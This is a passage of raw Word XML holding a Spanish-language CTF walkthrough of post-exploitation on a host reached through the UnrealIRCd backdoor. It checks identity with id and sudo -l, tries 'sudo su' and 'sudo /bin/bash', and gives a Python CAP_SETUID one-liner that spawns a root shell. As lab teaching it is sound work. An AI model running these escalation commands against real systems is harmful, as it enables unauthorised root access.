        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Muestra con qué usuario estás ejecutando comandos en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E85122" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00E066E8" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0585A61D" w14:textId="55F0DAD4" w:rsidR="003D40AB" w:rsidRPr="003D40AB" w:rsidRDefault="003D40AB" w:rsidP="003D40AB">
      <w:pPr>
        <w:ind w:left="284" w:firstLine="424"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D40AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="003D40AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>rcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71D10275" w14:textId="73830C8E" w:rsidR="00ED2427" w:rsidRPr="00A70AA9" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9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A70AA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Paso 2: Verificar los privilegios completos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5825EE" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="003D40AB" w:rsidRDefault="00ED2427" w:rsidP="003D40AB">
      <w:pPr>
        <w:ind w:left="284" w:firstLine="424"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D40AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B41D2A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Explicación del comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF97EA" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>id: Identity - Muestra información detallada sobre el usuario actual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103ED09" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Incluye UID (User ID), GID (Group ID) y grupos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA94405" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Muestra información completa de identidad y permisos del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA32DD0" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00E066E8" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A407BFD" w14:textId="77777777" w:rsidR="003D40AB" w:rsidRPr="003D40AB" w:rsidRDefault="003D40AB" w:rsidP="003D40AB">
      <w:pPr>
        <w:ind w:left="284" w:firstLine="424"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D40AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D40AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>=1001(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D40AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>ircd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D40AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>) gid=1001(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D40AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>ircd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D40AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>) groups=1001(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D40AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>ircd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D40AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D3C240" w14:textId="23691100" w:rsidR="00ED2427" w:rsidRPr="00E066E8" w:rsidRDefault="00ED2427" w:rsidP="00A70AA9">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Análisis Importante:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FC0B26" w14:textId="77777777" w:rsidR="00E066E8" w:rsidRDefault="00E066E8" w:rsidP="00E066E8">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si ves </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=1001(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ircd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> significa que eres el usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ircd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">(no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> aún).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B448F83" w14:textId="77777777" w:rsidR="00E066E8" w:rsidRPr="00E066E8" w:rsidRDefault="00E066E8" w:rsidP="00E066E8">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve">¿Por qué NO somos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E066E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> directamente?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10428536" w14:textId="77777777" w:rsidR="00E066E8" w:rsidRDefault="00E066E8" w:rsidP="00E066E8">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El servidor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> se ejecuta como usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ircd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (usuario sin privilegios) siguiendo el principio de mínimo privilegio. El backdoor ejecuta comandos con los mismos permisos que el proceso del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD1C64" w14:textId="77777777" w:rsidR="00E066E8" w:rsidRDefault="00E066E8" w:rsidP="00E066E8">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> En este CTF: Obtuvimos acceso como usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ircd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, lo cual es correcto y realista.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23879F74" w14:textId="233715E0" w:rsidR="00E066E8" w:rsidRDefault="00E066E8" w:rsidP="00E066E8">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NO tenemos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> todavía - Necesitamos escalar privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352CFC55" w14:textId="452F5F52" w:rsidR="009F63A2" w:rsidRPr="009F63A2" w:rsidRDefault="009F63A2" w:rsidP="00C75B1C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F63A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Paso </w:t>
      </w:r>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="009F63A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Verificar permisos actuales de sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D90B1E" w14:textId="77777777" w:rsidR="009F63A2" w:rsidRPr="009F63A2" w:rsidRDefault="009F63A2" w:rsidP="00C75B1C">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="009F63A2">
        <w:t>Lo primero que hacemos es ver si nuestro usuario puede ejecutar algo con sudo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E965BC9" w14:textId="77777777" w:rsidR="009F63A2" w:rsidRPr="009F63A2" w:rsidRDefault="009F63A2" w:rsidP="00C75B1C">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="009F63A2">
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294BF953" w14:textId="77777777" w:rsidR="009F63A2" w:rsidRPr="009F63A2" w:rsidRDefault="009F63A2" w:rsidP="00C75B1C">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="009F63A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A8ADAE" w14:textId="77777777" w:rsidR="009F63A2" w:rsidRPr="009F63A2" w:rsidRDefault="009F63A2" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="009F63A2">
        <w:t xml:space="preserve">sudo: Super </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F63A2">
        <w:t>User</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F63A2">
        <w:t xml:space="preserve"> DO - Ejecutar como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F63A2">
        <w:t>superusuario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C1BE5D1" w14:textId="77777777" w:rsidR="009F63A2" w:rsidRPr="009F63A2" w:rsidRDefault="009F63A2" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="009F63A2">
        <w:t xml:space="preserve">-l: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F63A2">
        <w:t>List</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F63A2">
        <w:t xml:space="preserve"> - Lista los comandos que puedes ejecutar con sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554C7B8F" w14:textId="77777777" w:rsidR="009F63A2" w:rsidRPr="009F63A2" w:rsidRDefault="009F63A2" w:rsidP="00C75B1C">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="009F63A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="009F63A2">
        <w:t xml:space="preserve"> Muestra qué comandos puedes ejecutar como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F63A2">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F63A2">
        <w:t xml:space="preserve"> sin necesitar contraseña (o con tu contraseña).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580AC8E1" w14:textId="56F8D57C" w:rsidR="00E066E8" w:rsidRPr="00B8326D" w:rsidRDefault="009F63A2" w:rsidP="00C75B1C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8326D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Posibles resultados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5DC62F" w14:textId="26FD99BE" w:rsidR="009F63A2" w:rsidRDefault="009F63A2" w:rsidP="00C75B1C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="009F63A2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69FFE191" wp14:editId="695E5D85">
            <wp:extent cx="5425557" cy="737775"/>
            <wp:effectExtent l="76200" t="76200" r="137160" b="139065"/>
            <wp:docPr id="2013466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66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577" cy="741993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6561F4" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRDefault="00B8326D" w:rsidP="00C75B1C">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Probar alguna de estas opciones y verificar si </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> puede escalar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C44D7A4" w14:textId="066B7ECC" w:rsidR="00B8326D" w:rsidRPr="00C75B1C" w:rsidRDefault="00B8326D" w:rsidP="00C75B1C">
      <w:pPr>
        <w:ind w:left="284" w:firstLine="424"/>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>sudo su</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3439A2DA" w14:textId="37B9CE9D" w:rsidR="00E066E8" w:rsidRDefault="00B8326D" w:rsidP="00C75B1C">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>sudo /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00229510" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 2A: Escalar privilegios con Python usando CAP_SETUID </w:t>
      </w:r>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⭐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BD277B" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve">El servicio tiene la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>capability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> CAP_SETUID habilitada, lo que nos permite cambiar nuestro UID a 0 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A07B04" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C2ECE" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os.setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(0); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC7378" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación detallada del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A6AC3F" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>python3 -c: Ejecuta código Python desde la línea de comandos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2AA4B5" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>import</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> os: Importa el módulo del sistema operativo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FD99F5" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>os.setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve">(0): Cambia el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>User</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> ID a 0 (que es </w:t>
      </w:r>
